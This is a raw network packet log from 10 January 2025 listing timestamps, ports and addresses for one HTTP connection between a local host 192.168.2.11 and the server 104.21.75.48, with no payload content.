Jan 10, 2025 19:12:29.726728916 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.726739883 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.726789951 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.726789951 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.726885080 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.726897955 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.726908922 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.726921082 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.726933002 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.726948023 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.726964951 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.726964951 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.726979017 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.727070093 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.727082968 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.727093935 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.727107048 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.727118969 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.727129936 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.727150917 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.727154970 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.727154970 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.727164030 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.727175951 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.727204084 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.727204084 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.727284908 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.727293015 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.727304935 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.727334976 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.727353096 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.727364063 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.727376938 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.727386951 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.727399111 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.727406025 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.727406025 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.727411032 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.727416992 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.727430105 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.727442026 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.727456093 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.727456093 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.727462053 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.727473974 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.727485895 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.727499962 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.727500916 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.727500916 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.727514982 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.727550030 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.727564096 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.727735996 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.727751970 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.727765083 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.727777004 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.727816105 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.727816105 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.728168964 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728183031 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728194952 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728209019 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728220940 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728231907 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728243113 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728255033 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728255987 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.728266001 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728277922 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728286982 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.728286982 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.728288889 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728323936 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.728323936 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.728578091 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728590965 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728600979 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728612900 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728625059 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728636980 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728641033 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.728641033 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.728656054 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728667974 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728678942 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728692055 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728705883 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728718042 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728719950 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.728719950 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.728728056 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728735924 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.728740931 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728751898 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728759050 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.728775024 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728786945 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728797913 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728811979 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728811979 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.728811979 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.728825092 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728837013 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728847027 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.728847027 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.728849888 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.728898048 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.728898048 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.729091883 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729234934 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729247093 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729258060 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729263067 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.729274988 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729285955 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729290962 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.729290962 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.729299068 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729310036 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729322910 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729332924 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.729332924 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.729342937 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729355097 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729367018 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729367018 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.729378939 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729392052 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729399920 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.729401112 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.729403973 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729417086 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729428053 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729439020 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729449034 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.729449034 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.729451895 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729464054 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729475975 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729479074 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.729511023 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.729537964 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.729860067 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729875088 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729886055 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729893923 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729906082 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729916096 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.729917049 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729928970 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729942083 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729953051 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729953051 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.729953051 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.729965925 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729978085 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.729998112 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.729998112 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.730046034 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.805788040 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.805813074 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.805824995 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.805835962 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.805850029 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.805916071 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.805937052 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.805948973 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.805958986 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.805967093 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.805970907 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.805984020 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.805990934 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.805990934 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.806020021 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.806071997 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.806085110 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.806096077 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.806107998 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.806133032 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.806133032 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.806174994 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.806826115 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.806838036 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.806863070 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.806873083 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.806884050 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.806895971 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.806909084 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.806910038 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.806909084 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.806945086 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.806945086 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.806972980 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.806983948 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.806993961 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807010889 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807022095 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807032108 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807034016 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.807044029 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807046890 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.807080030 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.807080030 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.807122946 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807133913 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807146072 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807157040 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807171106 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807172060 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.807199955 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.807224035 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807234049 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807243109 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807264090 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807271957 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.807276011 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807286024 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807295084 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.807305098 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807324886 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807332039 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.807332993 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.807352066 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.807372093 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.807491064 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807502031 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807512999 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807531118 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807537079 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.807542086 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807555914 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807569027 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807579994 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807585001 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.807585001 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.807590961 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807601929 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807614088 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807617903 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.807674885 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.807674885 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.807697058 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807709932 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807727098 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807737112 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807748079 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807759047 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807770014 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.807770014 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.807776928 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807789087 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807796001 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.807800055 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807812929 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807820082 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.807826996 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.807869911 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.807869911 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.815140963 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.815165997 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.815176010 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.815193892 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.815205097 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.815229893 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.815229893 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.815265894 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.815505028 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.815570116 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.815581083 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.815649033 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.815661907 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.815691948 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.815691948 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.815709114 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.815718889 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.815730095 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.815757036 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.815773010 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.815788984 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.815810919 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.815821886 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.815833092 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.815860987 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.815860987 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.815932035 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.815946102 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.815956116 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.815968037 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.815979958 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.815995932 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.816032887 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.816108942 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.816119909 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.816131115 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.816142082 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.816154003 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.816165924 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.816178083 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.816184998 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.816215992 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.816215992 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.816270113 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.816282034 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.816293001 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.816339970 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.816412926 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.816469908 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.816649914 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.816662073 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.816673040 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.816684008 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.816709042 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.816728115 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.817190886 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.817203045 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.817213058 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.817226887 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.817250013 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.817250013 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.817266941 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.817276955 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.817291021 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.817297935 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.817297935 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.817301035 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.817334890 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.817334890 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.817774057 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.817785025 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.817794085 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.817812920 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.817822933 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.817833900 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.817845106 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.817857981 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.817857027 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.817857027 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.817867041 CET	80	49726	104.21.75.48	192.168.2.11
Jan 10, 2025 19:12:29.817905903 CET	49726	80	192.168.2.11	104.21.75.48
Jan 10, 2025 19:12:29.817905903 CET	49726	80	192.168.2.11	104.21.75.48
